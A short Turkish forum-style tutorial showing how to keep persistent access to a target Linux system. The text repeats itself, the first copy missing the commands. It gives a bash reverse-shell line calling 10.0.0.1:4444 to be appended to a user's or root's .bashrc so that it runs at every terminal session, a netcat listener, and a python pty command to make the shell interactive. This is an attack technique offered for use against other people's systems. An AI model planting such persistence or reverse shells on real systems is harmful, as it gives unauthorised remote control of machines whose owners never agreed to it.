Merhabalar dostlar ben @spyizxa1 bu konuda bir linux sistemde kalıcılık sağlamak için basit bi yöntemi göstereceğim.
hedef sistemde kalıcı ve etkili bir ters bağlantı (reverse shell) elde etmek için .bashrc dosyasını kullanacağız bashrc dosyası, her terminal oturumunda çalıştığı için kalıcılık sağlayabiliriz.
Bu kodu /.bashrc ya da /root/.bashrc dosyasına ekliyoruz.
Bu komut ile dinleme işlemini gerçekleştiriyoruz.
İnteraktif Shell?
Diğer konuda bahsetmedim burada bahsedeyim, bi sistemden shell aldığınız zaman o shelli interaktif shelle dönüştürmenizi öneririm çünkü interaktif shellin farkı ok tuşlarını kullanma, komut geçmişine bakma gibi özellikleri aktif ediyor bununda size yararı dokunur...
Bu kodu terminale yapistirarak interaktif hale getirebilirsiniz
THE END
hedef sistemde kalıcı ve etkili bir ters bağlantı (reverse shell) elde etmek için .bashrc dosyasını kullanacağız bashrc dosyası, her terminal oturumunda çalıştığı için kalıcılık sağlayabiliriz.
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1Bu kodu /.bashrc ya da /root/.bashrc dosyasına ekliyoruz.
nc -lvnp 4444Bu komut ile dinleme işlemini gerçekleştiriyoruz.
İnteraktif Shell?
Diğer konuda bahsetmedim burada bahsedeyim, bi sistemden shell aldığınız zaman o shelli interaktif shelle dönüştürmenizi öneririm çünkü interaktif shellin farkı ok tuşlarını kullanma, komut geçmişine bakma gibi özellikleri aktif ediyor bununda size yararı dokunur...
python3 -c 'import pty; pty.spawn("/bin/bash")'Bu kodu terminale yapistirarak interaktif hale getirebilirsiniz
THE END